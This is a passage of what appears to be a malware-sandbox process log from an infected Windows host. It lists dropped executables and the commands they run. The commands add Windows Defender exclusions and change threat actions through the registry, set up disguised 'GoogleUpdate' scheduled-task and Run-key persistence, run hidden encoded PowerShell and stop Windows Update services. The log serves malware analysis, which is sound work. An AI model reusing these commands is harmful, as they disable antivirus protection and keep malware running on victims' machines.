PID:7576

C:\Users\Admin\AppData\Local\Temp\a\kmkzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\kmkzx.exe"
2⤵
PID:7868

C:\Users\Admin\AppData\Local\Temp\a\johnzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\johnzx.exe"
2⤵
PID:7660

C:\Users\Admin\AppData\Local\Temp\a\pumkinzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\pumkinzx.exe"
2⤵
PID:7764

C:\Users\Admin\AppData\Local\Temp\a\NewM.exe
"C:\Users\Admin\AppData\Local\Temp\a\NewM.exe"
2⤵
PID:5376

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $file='C:\Users\Admin\AppData\Local\Temp\a\NewM.exe';for($i=1;$i -le 600 -and (Test-Path $file -PathType leaf);$i++){Remove-Item $file;Start-Sleep -m 100}
3⤵
PID:6692

C:\Users\Admin\AppData\Local\Temp\a\donpyzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\donpyzx.exe"
2⤵
PID:4716

C:\Users\Admin\AppData\Local\Temp\a\ts.exe
"C:\Users\Admin\AppData\Local\Temp\a\ts.exe"
2⤵
PID:8064

C:\Users\Admin\AppData\Local\Temp\a\My2.exe
"C:\Users\Admin\AppData\Local\Temp\a\My2.exe"
2⤵
PID:7720

C:\Users\Admin\AppData\Local\Temp\a\secbobbyzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\secbobbyzx.exe"
2⤵
PID:684

C:\Users\Admin\AppData\Local\Temp\wfwvuws.exe
"C:\Users\Admin\AppData\Local\Temp\wfwvuws.exe" C:\Users\Admin\AppData\Local\Temp\wammagdq.lpz
3⤵
PID:6604

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
1⤵
PID:2252

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:4700

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lzkcwj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
1⤵
PID:4544

C:\Windows\System32\GamePanel.exe
"C:\Windows\System32\GamePanel.exe" 0000000000010296 /startuptips
1⤵
PID:5552

C:\Windows\System32\bcastdvr.exe
"C:\Windows\System32\bcastdvr.exe" -ServerName:Windows.Media.Capture.Internal.BroadcastDVRServer
1⤵
PID:5640

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#rjzfniou#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe" }
1⤵
PID:2420

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
2⤵
PID:5604

C:\Users\Admin\AppData\Local\Temp\dSEqUCVOPUvmFZjdC\aohSQnOiRdvcplp\hhZDApx.exe
C:\Users\Admin\AppData\Local\Temp\dSEqUCVOPUvmFZjdC\aohSQnOiRdvcplp\hhZDApx.exe 5E /site_id 385104 /S
1⤵
PID:4188

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
2⤵
PID:2684

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BNyTRLFWpkwbC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BNyTRLFWpkwbC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JDdywVbgHqEU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JDdywVbgHqEU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KnniQPNKaQpppomCylR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KnniQPNKaQpppomCylR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RMSgaodHU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RMSgaodHU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kGOVMDjYHeUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kGOVMDjYHeUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\XrXLdSjsBkDyCEVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\XrXLdSjsBkDyCEVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\dSEqUCVOPUvmFZjdC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\dSEqUCVOPUvmFZjdC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\QZIGawXLVDAhKfqK\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\QZIGawXLVDAhKfqK\" /t REG_DWORD /d 0 /reg:64;"
2⤵
PID:2364

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BNyTRLFWpkwbC" /t REG_DWORD /d 0 /reg:32
3⤵
PID:6688

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BNyTRLFWpkwbC" /t REG_DWORD /d 0 /reg:64
3⤵
PID:4036

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JDdywVbgHqEU2" /t REG_DWORD /d 0 /reg:32
3⤵
PID:3600

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JDdywVbgHqEU2" /t REG_DWORD /d 0 /reg:64
3⤵
PID:32

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KnniQPNKaQpppomCylR" /t REG_DWORD /d 0 /reg:32
3⤵
PID:6084

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KnniQPNKaQpppomCylR" /t REG_DWORD /d 0 /reg:64
3⤵
PID:4648

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RMSgaodHU" /t REG_DWORD /d 0 /reg:32
3⤵
PID:4476

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RMSgaodHU" /t REG_DWORD /d 0 /reg:64
3⤵
PID:5892

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kGOVMDjYHeUn" /t REG_DWORD /d 0 /reg:32
3⤵
PID:7012

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kGOVMDjYHeUn" /t REG_DWORD /d 0 /reg:64
3⤵
PID:3664

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\XrXLdSjsBkDyCEVB /t REG_DWORD /d 0 /reg:32
3⤵
PID:3236

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\XrXLdSjsBkDyCEVB /t REG_DWORD /d 0 /reg:64
3⤵
PID:6908

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
3⤵
PID:6152

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
3⤵
PID:6868

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\dSEqUCVOPUvmFZjdC /t REG_DWORD /d 0 /reg:32
3⤵
PID:5252

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\dSEqUCVOPUvmFZjdC /t REG_DWORD /d 0 /reg:64
3⤵
PID:6948

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\QZIGawXLVDAhKfqK /t REG_DWORD /d 0 /reg:32
3⤵
PID:3716

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\QZIGawXLVDAhKfqK /t REG_DWORD /d 0 /reg:64
3⤵
PID:3620

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gEJdSnTmx" /SC once /ST 00:29:27 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
2⤵
- Creates scheduled task(s)
PID:4116

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gEJdSnTmx"
2⤵
PID:6168

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gEJdSnTmx"
2⤵
PID:5128

C:\Users\Admin\AppData\Local\Temp\7C92.exe
C:\Users\Admin\AppData\Local\Temp\7C92.exe
1⤵
PID:3532

C:\Users\Admin\AppData\Local\Temp\SETUP_3555\Engine.exe
C:\Users\Admin\AppData\Local\Temp\SETUP_3555\Engine.exe /TH_ID=_1668 /OriginExe="C:\Users\Admin\AppData\Local\Temp\7C92.exe"
2⤵
PID:4608

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c cmd < Reflection
3⤵
PID:4948

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Reflection
3⤵
PID:6072

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:3584

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:3372

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4932

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:5420

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:5184

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4044

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:2140

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:6224

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Service.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Service.exe"
1⤵
PID:6320

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:6548

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\y6889199.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\y6889199.exe
1⤵
PID:6636

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\k6640079.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\k6640079.exe
2⤵
PID:6756

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\l0550331.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\l0550331.exe
2⤵
PID:5788

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\f9344787.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\f9344787.exe
1⤵
PID:6384

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /7
1⤵
PID:1284

C:\Windows\SysWOW64\werfault.exe
werfault.exe /h /shared Global\1db9ec85740d498284746c3a79e9a2ba /t 5840 /p 5552
1⤵
PID:2212

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:6632

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:6260

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:5540

C:\Users\Admin\AppData\Roaming\bgvwrev
C:\Users\Admin\AppData\Roaming\bgvwrev
1⤵
PID:6912

C:\Users\Admin\AppData\Local\Temp\c3912af058\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\c3912af058\oneetx.exe
1⤵
PID:360

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:6860

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
1⤵
PID:4764

C:\Windows\System32\sc.exe
sc stop UsoSvc
2⤵
- Launches sc.exe
PID:1636

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
2⤵
- Launches sc.exe
PID:3496

C:\Windows\System32\sc.exe
sc stop wuauserv
2⤵
- Launches sc.exe
PID:1632

C:\Windows\System32\sc.exe
sc stop bits
2⤵
- Launches sc.exe
PID:876

C:\Windows\System32\sc.exe
sc stop dosvc
2⤵
- Launches sc.exe
PID:5272

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:5416

C:\Users\Admin\AppData\Local\Temp\dSEqUCVOPUvmFZjdC\aohSQnOiRdvcplp\hhZDApx.exe
C:\Users\Admin\AppData\Local\Temp\dSEqUCVOPUvmFZjdC\aohSQnOiRdvcplp\hhZDApx.exe 5E /site_id 385104 /S
1⤵
PID:2784

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
2⤵
PID:1780

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
3⤵
PID:6756

C:\Windows\SysWOW64\reg.exe
